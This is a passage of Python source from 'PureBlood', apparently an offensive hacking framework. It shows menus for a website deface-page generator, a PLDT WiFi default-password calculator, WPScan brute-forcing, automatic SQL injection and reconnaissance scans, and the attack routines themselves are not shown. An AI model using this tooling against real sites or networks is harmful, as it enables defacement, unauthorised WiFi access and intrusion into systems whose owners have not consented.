▒▓▒░ ░ ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒
░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░ ░ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
except:
if sys.version_info[0] == 3:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold))
elif sys.version_info[0] == 2:
banner = ("""{1}
o--o o--o o o
| | | | | |
O--o o o o-o o-o O--o | o-o o-o o-O
| | | | |-' | | | | | | | | |
o o--o o o-o o--o o o-o o-o o-o
{2}--={3}[ {0}{5}Author: Cr4sHCoD3 {3}]{2}=--
{4}| {2}-- --={3}[ {0}{5}Version: 2 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}Website: https://github.com/cr4shcod3 {3}]{2}=-- -- {4}|
| {2}-- --={3}[ {0}{5}PureHackers ~ Blood Security Hackers {3}]{2}=-- -- {4}|
{0}
""".format(reset, red, green, blue, yellow, bold)).decode('utf-8')
print (banner)
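# Populate the global url/hostname/ip values from the chosen target, then return to the menu given by wfunc (1 = Web Pentest, 2 = Web Application Attack, anything else = main menu).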
def set_target(target, wfunc):
global url
global hostname
global ip
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
if target[0].isdigit():
ip = target
elif '=' in target:
ip = None # This is it for now.
else:
ip = socket.gethostbyname(hostname)
if wfunc == 1:
web_pentest()
elif wfunc == 2:
web_application_attack()
else:
main()
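# Generator menu: deface page, random password, PLDT WiFi password calculator and text-to-hash utilities.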
def generator():
print ("""{3}[ {5}Generator {3}]
{2}01{3}) {5}Deface Page Generator
{2}02{3}) {5}Password Generator
{2}03{3}) {5}PLDT WiFi Password Calculator
{2}04{3}) {5}Text To Hash
{2}90{3}) {5}Back To Menu
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}Generator{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
cgenerator = Generator()
if choice == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
if sys.version_info[0] == 3:
title = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
title = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Title{1})> {2}'.format(green, blue, cyan, red)))
shortcut_icon = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Shortcut Icon{1})> {2}'.format(green, blue, cyan, red)))
meta_description = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Description{1})> {2}'.format(green, blue, cyan, red)))
meta_image = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Meta Image{1})> {2}'.format(green, blue, cyan, red)))
logo = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Logo{1})> {2}'.format(green, blue, cyan, red)))
hacker_name = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Hacker Name{1})> {2}'.format(green, blue, cyan, red)))
message1 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 1{1})> {2}'.format(green, blue, cyan, red)))
message2 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Message 2{1})> {2}'.format(green, blue, cyan, red)))
groups = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Group/s{1})> {2}'.format(green, blue, cyan, red)))
deface_page_output_filename = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>({3}Output Filename{1})> {2}'.format(green, blue, cyan, red)))
gdeface_page = cgenerator.deface_page(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups)
if '.html' not in deface_page_output_filename: deface_page_output_filename = deface_page_output_filename + '.html'
deface_page_output_file = open('outputs/generator/' + deface_page_output_filename, 'w+')
deface_page_output_file.write(gdeface_page)
deface_page_output_file.close()
print ('\nOutput saved in outputs/generator/' + deface_page_output_filename)
print (reset + bold)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 2:
if sys.version_info[0] == 3:
length = int(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
length = int(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Length{1})> {2}'.format(green, blue, cyan, red)))
text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gpassword_generator1, gpassword_generator2, gpassword_generator3 = cgenerator.password_generator(length, text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('Random Password: ' + gpassword_generator1)
print ('MD5: ' + gpassword_generator2)
print ('L33T: ' + gpassword_generator3)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 3:
if sys.version_info[0] == 3:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
print ('{2}[{1}#{2}] {3}- {4}Last 5 Numbers if any. EX: PLDTHOMEDSLXXXXX where X is the number{0}'.format(reset, green, blue, yellow, cyan))
digit5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 Digit{1})> {2}'.format(green, blue, cyan, red)))
print ('{2}[{1}#{2}] {3}- {4}Last 5 MAC Characters. EX: 00:4a:00:d0:44:c0 where 044C0 is the last 5 MAC Characters{0}'.format(reset, green, blue, yellow, cyan))
mac5 = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}PasswordGenerator{1}>({3}Last 5 MAC Char{1})> {2}'.format(green, blue, cyan, red)))
gpldt_password_calculator1, gpldt_password_calculator2, gpldt_password_calculator3, gpldt_password_calculator4, gpldt_password_calculator5 = cgenerator.pldt_password_calculator(digit5, mac5)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('[#] - Possible Password of the PLDT WIFI:')
print ('\nFOR : PLDTHOMEDSL, PLDTmyDSLPAL, and PLDTmyDSLBiz')
for i in gpldt_password_calculator1:
print (' > ' + i)
print ('\nFOR : PLDTHOMEDSLxxxxx')
for i in gpldt_password_calculator2:
print (' > ' + i)
print ('\nFOR : PLDTHOMEFIBR_xxxxxx')
print (' > ' + gpldt_password_calculator3)
print ('\nFOR : PLDTHOMEFIBRxxxxxx')
for i in gpldt_password_calculator4:
print (' > ' + i)
print ('\nFOR : HomeBro_Ultera')
print (' > ' + gpldt_password_calculator5)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 4:
if sys.version_info[0] == 3:
text = str(input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
text = str(raw_input('{0}PureBlood{1}>{0}Generator{1}>{0}TextToHash{1}>({3}Text{1})> {2}'.format(green, blue, cyan, red)))
gtext_to_hash = cgenerator.text_to_hash(text)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (gtext_to_hash)
print (reset)
print ('{0}='.format(red) * int(sizex))
generator()
elif choice == 90:
main()
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
generator()
'''def network_pentest():
print ("""\n\n
{3}[ {5}Network Pentest {3}]
{2}01{3}) {5}?
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}NetworkPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('')
# print ('\n[+] - Output saved in outputs/network_pentest/' + network_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {4}Exiting...{0}'.format(reset, green, blue, yellow, cyan))
sys.exit()
except ValueError:
print ('{2}[{1}+{2}] {3}- {4}Please enter a valid number!{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
main()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}NetworkPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('')
# print ('\n[+] - Output saved in outputs/network_pentest/' + network_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {4}Exiting...{0}'.format(reset, green, blue, yellow, cyan))
sys.exit()
except ValueError:
print ('{2}[{1}+{2}] {3}- {4}Please enter a valid number!{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
main()
if choice == 1:
main()
elif choice == 90:
main()
elif choice == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
set_target(target, 3)
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {4}Exiting...{0}'.format(reset, green, blue, yellow, cyan))
sys.exit()
else:
print ('{2}[{1}+{2}] {3}- {4}Please enter a valid choice!{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
network_pentest()'''
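# Web Application Attack menu: WPScan wrappers, Wordpress plugin vulnerability check and automatic SQL injection.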
def web_application_attack():
global cweb_application_atttack
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}Wordpress
{2}02{3}) {5}SQL Injection
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
cweb_application_atttack = WebApplicationAttack()
if choice == 1:
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}WPScan (Kali Linux) - Install manually on other OS
{2}02{3}) {5}WPScan Bruteforce (Kali Linux) - Install manually on other OS
{2}03{3}) {5}Wordpress Plugins Vulnerability Checker
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice1 = int(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice1 = int(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
if choice1 == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan = cweb_application_atttack.wp_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
elif choice1 == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan_bruteforce = cweb_application_atttack.wp_scan_bruteforce(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 3: # Exploit-DB.com
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wordpress_plugin_checker = cweb_application_atttack.wordpress_vulnerability_check(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 90:
main()
elif choice1 == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" at the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
set_target(target, 2)
elif choice1 == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif choice == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_auto_sql_injection = cweb_application_atttack.auto_sql_injection(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
print ('')
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice == 90:
main()
elif choice == 95:
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" at the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
print ('')
set_target(target, 2)
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
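# Web Pentest / information gathering menu; most options require a target set via option 95 and append their results to the per-target output file.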
def web_pentest():
global web_pentest_output
global web_pentest_outputfile
print ("""{3}[ {5}Web Pentest {3}]
{2}01{3}) {5}Banner Grab
{2}02{3}) {5}Whois
{2}03{3}) {5}Traceroute
{2}04{3}) {5}DNS Record
{2}05{3}) {5}Reverse DNS Lookup
{2}06{3}) {5}Zone Transfer Lookup
{2}07{3}) {5}Port Scan
{2}08{3}) {5}Admin Panel Scan
{2}09{3}) {5}Subdomain Scan
{2}10{3}) {5}CMS Identify
{2}11{3}) {5}Reverse IP Lookup
{2}12{3}) {5}Subnet Lookup
{2}13{3}) {5}Extract Page Links
{2}14{3}) {5}Directory Fuzz
{2}15{3}) {5}File Fuzz
{2}16{3}) {5}Shodan Search
{2}17{3}) {5}Shodan Host Lookup
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
cweb_pentest = WebPentest()
if choice == 1:
try:
wp_banner_grab = cweb_pentest.banner_grab(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Banner Grab Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_banner_grab)
web_pentest_outputfile.write('\n' + wp_banner_grab)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 2:
try:
wp_whois = cweb_pentest.whois(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Whois Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_whois)
web_pentest_outputfile.write('\n' + str(wp_whois))
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 3:
try:
wp_traceroute = cweb_pentest.traceroute(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Traceroute Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_traceroute)
web_pentest_outputfile.write('\n' + wp_traceroute)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 4:
try:
wp_dns_record = cweb_pentest.dns_record(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] DNS Record Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_dns_record:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 5:
try:
wp_reverse_dns_lookup = cweb_pentest.reverse_dns_lookup(ip)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse DNS Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_dns_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_dns_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 6:
try:
wp_zone_transfer_lookup = cweb_pentest.zone_transfer_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Zone Transfer Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_zone_transfer_lookup)
web_pentest_outputfile.write('\n' + wp_zone_transfer_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 7:
if sys.version_info[0] == 3:
port_end = int(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
port_end = int(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_port_scan = cweb_pentest.port_scan(hostname, port_end)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Port Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_port_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 8:
try:
wp_admin_panel_scan = cweb_pentest.admin_panel_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Admin Panel Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_admin_panel_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 9:
if sys.version_info[0] == 3:
subdomain_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subdomain_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subdomain_scan = cweb_pentest.subdomain_scan(hostname, subdomain_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
so_200, so_301, so_302, so_403 = wp_subdomain_scan
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Subdomain Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in so_200:
print ('[+] 200 - ' + i)
web_pentest_outputfile.write('[+] 200 - ' + i + '\n')
for i in so_301:
print ('[!] 301 - ' + i)
web_pentest_outputfile.write('[+] 301 - ' + i + '\n')
for i in so_302:
print ('[!] 302 - ' + i)
web_pentest_outputfile.write('[+] 302 - ' + i + '\n')
for i in so_403:
print ('[!] 403 - ' + i)
web_pentest_outputfile.write('[+] 403 - ' + i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 10:
try:
wp_cms_detect = cweb_pentest.cms_detect(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] CMS Detect - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_cms_detect)
web_pentest_outputfile.write('\n' + wp_cms_detect)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 11:
try:
wp_reverse_ip_lookup = cweb_pentest.reverse_ip_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
